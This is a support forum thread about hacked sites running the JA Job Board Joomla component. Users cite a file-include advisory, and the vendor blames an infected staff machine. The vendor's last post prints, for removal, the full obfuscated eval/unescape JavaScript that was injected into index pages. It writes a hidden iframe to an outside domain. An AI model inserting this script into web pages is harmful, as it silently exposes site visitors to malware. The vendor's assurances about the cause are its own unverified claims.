Viewing 6 posts - 1 through 6 (of 6 total)
  • Author
    Posts
  • jtruelson Friend
    #150322

    Our development site was compromised. We have had to restore from a recent backup.
    All index pages were appended with hex coded script. Support ticket has been submitted – no reply as of yet.

    So far our efforts to isolate the cause have turned up the following:

    from
    http://www.securityfocus.com/bid/39384

    The JA Job Board ‘com_jajobboard’ component for Joomla! is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

    An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

    JA Job Board ‘com_jajobboard’ 1.4.4 is vulnerable; other versions may be affected.

    Anonymous Moderator
    #340174

    Hello jtruelson,

    We express sincere apology for all inconveniences and problems that you have faced. 🙁

    In fact, a new developer was newly assigned to share the support workload for job board and while he access your source via your FTP, the virus has penetrated to those files from his infected machine. I would like to confirm that the download package and our dev server is free from virus.

    His machine has been reinstalled now with anti virus protection. Please give us access to your FTP again via ticket ID# (DTD-726753) for correcting our mistake and fixing the related issues.

    He handles two cases and the other has been contacted to check if he faces the same problem for soonest solution

    spdave Friend
    #340320

    Hello,

    the Web site was hacked 2 times since the 1.4.4 updated ! Web site is now unavailable 😮 for me

    gavinallday Friend
    #340330

    Hi,

    My site was also hacked on Friday whilst awaiting support from your team.

    We have had to rebuild the site and work is still ongoing to restore it.

    I haven’t been contacted regarding your employees virus, but the two might be connected.

    Could you confirm that this is definitely due to a virus on the PC of one of your team, not a vulnerability in JobBoard itself?

    Is there anything else I should do to protect against further attacks?

    Thanks,

    siukin Friend
    #340357

    Also hacked here on sunday. I submitted a ticket.

    Anonymous Moderator
    #340407

    Hi all,

    • We would like to confirm that this is definitely due to a virus on the PC of one of out team, JA Job board packages as well as all other download packages, our dev servers are protected by licensed anti-virus system and free from virus. This is the first case and the last ever happens. We hereby apologizes for all inconveniences that may have causes.
    • There are many causes leading to security holes for hacked websites. The problem caused by auto generated scripts is just one of those.
    • After infection, the system shall not work stably. However, if the auto inserted scripts are removed from infected files, the whole system shall work fine again
    • SOLUTION:
    – For those whose job site seems not working stably recently, kindly open source files for tracking down infected files without influencing running computer or the whole websites because the strange scripts are lines of Javascript not program file with *.exe
    – Infected files (normally in index.php or index2.php and some of files from running template) shall be inserted with the below unwanted lines at the bottom. You can manually search and get it removed. The unwanted script is as follows

    <blockquote><script>eval(unescape(‘%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75%2C%73%70%2C%49%41%76%42%2C%53%56%50%45%2C%74%77%68%29%7B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%73%70%29%7B%72%65%74%75%72%6E%20%73%70%2E%74%6F%53%74%72%69%6E%67%28%73%6A%63%75%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%73%70%2D%2D%29%74%77%68%5B%53%56%50%45%28%73%70%29%5D%3D%49%41%76%42%5B%73%70%5D%7C%7C%53%56%50%45%28%73%70%29%3B%49%41%76%42%3D%5B%66%75%6E%63%74%69%6F%6E%28%53%56%50%45%29%7B%72%65%74%75%72%6E%20%74%77%68%5B%53%56%50%45%5D%7D%5D%3B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%73%70%3D%31%7D%3B%77%68%69%6C%65%28%73%70%2D%2D%29%69%66%28%49%41%76%42%5B%73%70%5D%29%68%4F%58%3D%68%4F%58%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%53%56%50%45%28%73%70%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%49%41%76%42%5B%73%70%5D%29%3B%72%65%74%75%72%6E%20%68%4F%58%7D%28%27%38%2E%30%28%22%3C%64%20%63%3D%5C%5C%22%62%3A%2F%2F%61%2E%39%2F%5C%5C%22%20%37%3D%31%20%36%3D%31%20%35%3D%5C%5C%22%34%3A%33%3B%32%3A%65%5C%5C%22%3E%22%29%3B%27%2C%31%35%2C%31%35%2C%27%77%72%69%74%65%7C%7C%70%6F%73%69%74%69%6F%6E%7C%68%69%64%64%65%6E%7C%76%69%73%69%62%69%6C%69%74%79%7C%73%74%79%6C%65%7C%68%65%69%67%68%74%7C%77%69%64%74%68%7C%64%6F%63%75%6D%65%6E%74%7C%63%6F%6D%7C%61%76%65%72%73%62%6F%6E%6B%6F%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%61%62%73%6F%6C%75%74%65%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29’)); </script></blockquote>

Viewing 6 posts - 1 through 6 (of 6 total)

This topic contains 6 replies, has 5 voices, and was last updated by Anonymous 14 years, 6 months ago.

We moved to new unified forum. Please post all new support queries in our New Forum